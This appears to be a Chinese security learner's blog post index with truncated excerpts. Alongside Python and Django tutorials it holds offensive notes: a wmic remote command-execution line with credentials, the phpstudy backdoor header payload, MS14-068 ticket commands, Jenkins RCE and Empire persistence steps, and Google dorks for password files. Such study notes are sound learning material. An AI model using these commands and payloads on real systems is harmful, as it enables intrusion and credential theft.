- 博客(155)
- 收藏
- 关注
RSS订阅
原创 Windows远程执行cmd命令的方法
觉得对自己有用 于是就记录下来了WMI执行命令(普通权限可以进行hash传递):无回显执行:wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>c:\result.txt"利用wmiexec工具配合进行反弹半交互shell:cscript.e...
2020-04-15 18:01:19
36801
原创 XML所引起的xss攻击
利用条件:1、满足同源策略test.jpg<?xml version="1.0" encoding="iso-8859-1"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><ht...
2019-10-15 09:41:41
4410
1
原创 XXE漏洞利用
英文全名即 Xml External Entity Injection, 即我们所说的 xml 外部实体注入攻击。实体可以通过预定义在文档中被调用,而实体的标识符又可以访问本地或者远程内容,当允许引用外部实体时,攻击者便可以构造恶意内容来达到攻击。XML:xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟...
2019-10-14 21:28:52
427
1
原创 UEditor 1.4.3.3的SSRF漏洞
产生漏洞的代码片段: ueditor\php\Uploader.class.phpprivate function saveRemote(){ $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&", "&", $imgUrl); //http开头验证...
2019-10-12 22:59:02
5413
原创 django上传图片功能
1、实现后台管理页面上传功能2、实现自定义上传文件功能后台管理页面上传功能1、新建模型类class PicTest(models.Model): goods_pic = models.ImageField(upload_to='booktest')2、创建相应的保存文件夹settings.py目录中创建文件夹,用于存储上传文件,并且在static目录下创建一个media的...
2019-10-05 14:29:01
947
原创 django 中间件
反正感觉有点复杂 硬着头皮吧!!!中间件函数是django框架给我们预留的函数接口,让我们可以干预请求和应答的过程。想要实现的需求:指定某个ip无法访问自己搭建的站点使用request对象的META属性:request.META['REMOTE_ADDR']通过装饰器去实现:Block_ip_lists = ['172.30.212.210']def to_block(func...
2019-10-04 20:51:40
133
原创 django 反向解析
反向解析: 当某一个url配置的地址发生变化时,页面上使用反向解析生成地址的位置不需要发生变化。比如:我们在视图函数中定义的index视图函数为如下:def index(request): return render(request, 'booktest/index.html')我们的urls.py路由文件定义如下:url(r'^index$', views.index),现...
2019-10-04 18:20:28
144
原创 django 验证码的应用
验证码的应用:1、减少暴力破解的概率 从而可能减少服务器后端的压力,节省资源1、 模块Pillow我们直接安装pip install Pillow(1-day) C:\Users\dell\Desktop\ALL\python\django\test4>pip install PillowCollecting Pillow Downloading https://files....
2019-10-04 15:50:25
251
原创 django 模板
模板的学习使用模板文件:流程: 1.加载模板文件 2.定义模板上下文 3.模板渲染1.加载模板文件:我们需要导入loader类,通过这个来加载我们的模板文件from django.template import loader2.定义模板上下文:我们需要导入RequestContext类来定义模板上下文from django.template import Reques...
2019-10-03 16:02:36
151
原创 django 静态文件的设置引入
1、工程目录的文件夹创建:(1-day) C:\Users\dell\Desktop\ALL\python\django\test3>tree卷 OS 的文件夹 PATH 列表卷序列号为 6AEE-CCADC:.├─.idea├─booktest│ ├─migrations│ │ └─__pycache__│ └─__pycache__├─static│ ├─...
2019-10-01 18:25:40
271
原创 django 两种登陆案例的简单实现
login.html模板文件定义如下:<form action="/login_check" method="post"> <label>用户名:<input type="text" name="username"></label><br> <label>用户名:<input type="passwor...
2019-10-01 15:32:39
308
原创 django 模型管理器对象
正常的实例化一个模型bookinfo类from booktest.models import BookInfo>>> BookInfo.objects.all()[<BookInfo: BookInfo object>, <BookInfo: BookInfo object>]这里objects是一个django自动生成的模型管理器对象,我们同样...
2019-10-01 10:55:12
219
原创 django 自关联
表内自关联:自关联是一种特殊的一对多的关系。定义的模型类:class AreaInfo(models.Model): atitle = models.CharField(max_length=20) # 关系属性 aparent_id = models.ForeignKey('self', null=True, blank=True)定义的视图函数:def to...
2019-09-30 21:41:06
261
原创 django 页面重定向实现的方法
自己现在已知在django中封装好的就只有两种方法1、 导入类from django.http import HttpResponseRedirect用法:return HttpResponseRedirect('/index')2、 导入函数from django.shortcuts import redirect用法:return redirect('/index')这个redi...
2019-09-29 19:24:54
784
原创 django配置使用mysql数据库
配置使用mysql数据库1.配置setting.py文件DATABASES = { 'default': { # 'ENGINE': 'django.db.backends.sqlite3', # 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), 'ENGINE': 'django.db.ba...
2019-09-29 16:41:32
293
原创 python django MVT的交互案例的简单实现
https://blog.csdn.net/q1352483315/article/details/101477527根据这个自己所学的 再实现一个简单的交互案例实现的内容:查找相应图书中对应的人物信息第一步:实现显示图书表中的数据在视图文件中导入:from booktest.models import BookInfo定义to_book函数,通过模型类操作数据库中相应的数据:de...
2019-09-29 15:33:03
218
原创 weblogic漏洞从0学习复现
这两天慢慢复现完weblogic的漏洞weblogic的历史漏洞#控制台路径泄露Weakpassword #SSRF:CVE-2014-4210 #JAVA反序列化:CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2018-2628 CVE-2018-2893 #任意文...
2019-09-27 09:23:39
565
原创 phpstudy php_xmlrpc.dll后门漏洞复现
搭建环境:phpstudy2018php版本5.4漏洞影响版本:5.2/5.4漏洞利用1、随便访问一个存在的php文件 我这里就访问index.php好了2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==Accept-Encoding: gzip,def...
2019-09-26 23:02:59
7143
原创 Google Hacking学习
对公网的语法:Index of /passwordIndex of / passwd“index?of/” xxx?(mp3、pdf)“Index of /” password.txtinurl:logininurl:php?id=1inurl:baidu.cominurl:phpMyAdmininurl:ewebeditorintitle:后台管理intitle:后台管理 ...
2019-09-26 22:36:05
1198
原创 python并发编程(并发与并行,同步和异步,阻塞与非阻塞)
哎我好难啊 学玩安全 回头之前刚学的代码又全忘记了1. 并发 & 并行:并发: 在操作系统中,是指一个时间段中有几个程序都处于已启动运行到运行完毕之间,且这几个程序都是在同一个处理机上运行,但任一个时刻点上只有一个程序在处理机上运行。简言之,是指系统具有处理多个任务的能力。并行: 当系统有一个以上CPU时,则线程的操作有可能非并发。当一个CPU执行一个线程时,另一个CPU可以执行...
2019-09-26 22:34:55
480
原创 python 学习Django第一天
安装虚拟环境virtualenv:1、安装命令:pip install virtualenvpip install virtualenvwrapper-win2、创建环境:mkvirtualenv 1-day # 创建虚拟环境结果:结果:C:\Users\dell\Desktop\ALL\python\django>mkvirtualenv 1-dayC:\Users\...
2019-09-26 22:29:24
279
转载 关于从js下手的一些渗透经验
如下说的并不是一定是的 还是根据实际情况来判断!!!1、如何判断是JS开发的站1、源代码简短2、引入多个js文件3、一般有/static/js/app.js 等顺序的js文件4、cookie中有connect.sid如何查看重要js文件1、寻找配置文件2、查看app.xxx.js(一般引入的js文件都在static静态目录下 搜索的时候可以直接尝试static搜索下手)查看j...
2019-09-25 19:56:16
1510
2
原创 正则表达式的深入学习
环视(断言/零宽断言):环视,在不同的地方又称之为零宽断言,简称断言。用一句通俗的话解释:环视,就是先从全局环顾一遍正则,(然后断定结果,)再做进一步匹配处理。断言,就是先从全局环顾一遍正则,然后断定结果,再做进一步匹配处理。两个虽然字面不一样,意思却是同一个,都是做全局观望,再做进一步处理。环视的作用相当于对其所在位置加了一个附加条件,只有满足这个条件,环视子表达式才能匹配成功。环...
2019-09-24 17:46:49
164
原创 python 模块调用学习
系统模块调用比如调用time模块中的time方法我们可以有两种方法:import timetime.time()from time import timetime()上面两个写法的最终目的都是为了获取并打印当前时间,方法一里面是直接引入了整个time模块,在用的时候需要加入模块名再进行其下面方法的引用time.time()。方法二中通过引入time模块,导入其下面的time方...
2019-09-23 21:49:59
188
原创 python 邮箱发送功能的实现
# coding=utf-8import smtplibfrom email.message import EmailMessagedef to_Send_sql(): smtp_server = 'smtp.qq.com' from_addr = '[email protected]' password = 'xxxxxx' to_addr = 'xxxxxxx...
2019-09-22 21:20:59
200
原创 python socket通信 多线程实现
服务端# coding=utf-8import threadingimport socketsocket_list = []s = socket.socket()s.bind(('172.30.213.238', 3000))s.listen()def read_from_client(s): try: return s.recv(1024).d...
2019-09-21 21:29:36
3186
1
原创 python 使用socket通信
服务端的创建:# coding=utf-8import socket# 创建socket对象s = socket.socket()# 将socket绑定到本机IP地址和端口s.bind(('172.30.213.238', 3000))# 服务端开始监听来自客户端的连接s.listen()while True: c, addr = s.accept() pr...
2019-09-21 20:05:39
201
原创 python 选择排序
# coding=utf-8a = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]for i in range(len(a)): temp = a[i] for j in range(i+1, len(a)): if temp < a[j]: temp = a[j] a[i] = temppri...
2019-09-21 17:54:53
85
原创 python 插入排序
# coding=utf-8# 插入排序的实现pythondef insertion_sort(arr): # 第一层for表示循环插入的遍数 for i in range(1, len(arr)): # 设置当前需要插入的元素 current = arr[i] # 与当前元素比较的比较元素 pre_inde...
2019-09-21 17:30:53
102
原创 python冒泡排序
# coding=utf-8a = [1, 8, 9, 6, 11, 3, 8, 2, 333]for i in range(len(a)-1): for j in range(i+1, len(a), 1): if(a[i] > a[j]): a[j], a[i] = a[i], a[j]print(a)
2019-09-21 16:23:50
110
原创 [CVE-2017-1000353]Jenkins-CI 远程代码执行漏洞
vulhub环境搭建:cd /root/vulhub/jenkins/CVE-2017-1000353docker-compose up -d访问网址http://120.79.66.58:8080/漏洞复现:1、先下载CVE-2017-1000353-1.1-SNAPSHOT-all.jar来生成相应利用的pocjava -jar CVE-2017-1000353-1.1-S...
2019-09-21 16:04:54
473
原创 BurpSuite解决爆破时候全是302的方法
有时候爆破会遇到多个302跳转BurpSuite有一个设置可以跟随跳转这样子设置了 burp就会跟到302跳转的界面 返回不同的页面长度 以此来进行判断
2019-09-16 20:25:09
8294
2
原创 MS14-068复现
kerberos认证流程非常的重要1、生成TGT:net config workstationms14-068.exe -u [email protected] -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top生成的票据:2、注入TGT:1)先查看自己的klist 如...
2019-09-15 15:29:40
679
原创 kerberos认证过程
KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGSAS(Authentication Server): 身份认证服务TGS(Ticket Granting Server): 票据授予服务TGT(Ticket Granting Ticket): 由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时Pass The ...
2019-09-14 23:47:18
730
原创 Empire之link后门维持权限
1.进入empire./reset.sh2、进去listeners设置监听器(Empire) > listeners(Empire: listeners) > uselistener http(Empire: listeners/http) > set Name lnk(Empire: listeners/http) > execute(Empire...
2019-09-14 13:26:04
702
原创 powershell的参数
PowerShell[.exe] [-PSConsoleFile <file> | -Version <version>] [-EncodedCommand <Base64EncodedCommand>] [-ExecutionPolicy <ExecutionPolicy>] [-File &...
2019-09-12 22:02:33
1496
原创 powershell的执行策略和绕过
当执行脚本的时候 你可能会在调用的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略:PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略简单介绍各种策略如下:名称与说明:Restricted 受限制的,可以执行单个的命令,但是不能执行...
2019-09-12 20:09:20
2829
原创 Tmux的使用
# 安装tmuxsudo yum install tux# 运行tmux并开启一个新的会话tmux# 显示所有会话tmux ls# 新建会话并指定会话名称(建议制定会话名称,以便了解该会话用途)tmux new -s <session-name># 新建会话(不指定会话名称)tmux new# 接入上一个会话tmux a# 接入指定名称的会话tmu...
2019-09-12 20:04:10
155
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人